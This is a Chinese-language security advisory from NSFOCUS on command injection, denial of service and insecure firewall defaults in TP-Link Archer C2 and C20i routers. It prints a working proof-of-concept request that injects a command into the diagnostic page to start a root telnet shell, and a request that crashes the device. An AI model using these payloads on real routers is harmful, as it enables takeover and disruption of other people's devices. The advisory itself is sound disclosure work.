TP-Link C2和C20i産品出現指令注入、DoS等多個漏洞 綠盟科技釋出安全威脅通告

tp-link archer c2 和 tp-link archer c20i都是該公司的路由器産品，近期這兩款産品爆出多個嚴重漏洞，綠盟科技就此情況釋出《tp-link c2和c20i指令注入、拒絕服務等漏洞安全威脅通告》，通告全文如下：

日前，pierrekim.github.io網站釋出了一個安全通告，公布了固件版本為“0.9.1 4.2 v0032.0 build 160706 rel.37961n”的tp-link c2和c20i産品的多個漏洞。漏洞包括指令注入(需要身份認證)、拒絕服務以及不安全的預設配置。

一個經過身份認證的攻擊者，可以僅僅通過發送一個http請求來進行指令注入，成功利用該漏洞，攻擊者可以以root權限執行指令。該漏洞的一個poc如下：

post /cgi?2 http/1.1 host: 192.168.1.1 content-type: text/plain referer: http://192.168.1.1/mainframe.htm content-length: 208 cookie: authorization=basic ywrtaw46ywrtaw4= connection: close

[ipping_diag#0,0,0,0,0,0#0,0,0,0,0,0]0,6 datablocksize=64 timeout=1 numberofrepetitions=1 host=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25) x_tp_connname=ewan_ipoe_d diagnosticsstate=requested

當攻擊者向具有漏洞裝置的“diagnostic”頁面發送上述請求時，就可以得到一個遠端shell:以root身份啟動telnetd程式。

一個經過身份認證的攻擊者，可以通過向目标發送如下請求來導緻裝置崩潰： get /cgi/ansi http/1.1

另外，這兩款産品還存在不安全的ip tables預設配置。該預設規則由/lib/libcmm.so産生，并将相關規則寫入檔案/var/tmp/dconf/rc.router。其中一條規則如下：

iptables -a input -p udp --dport 161 -j accept

該規則導緻snmp協定端口在每個網卡接口上都開放。

然而幸運的是，雖然snmp的相關配置可以通過/main/snmp.html頁面進行修改，但是snmpd程式已經從固件鏡像中删除了。

相關連結如下：https://pierrekim.github.io/advisories/2017-tplink-0x00.txt

使用“0.9.1 4.2 v0032.0 build 160706 rel.37961n”版本固件的tp-link c2和c20i。

tp-link廠商表示将會在今年釋出更新檔，以修補上述漏洞。作為臨時的緩解政策，使用者可以禁用wan口的管理功能。

本安全公告僅用來描述可能存在的安全問題，綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的資訊而造成的任何直接或者間接的後果及損失，均由使用者本人負責，綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告，必須保證此安全公告的完整性，包括版權聲明等全部内容。未經綠盟科技允許，不得任意修改或者增減此安全公告内容，不得以任何方式将其用于商業目的。

原文釋出時間：2017年3月24日 

本文由：綠盟科技釋出，版權歸屬于原作者

原文連結：http://toutiao.secjia.com/tp-link-c2-and-c20i-vulnerability

本文來自雲栖社群合作夥伴安全加，了解相關資訊可以關注安全加網站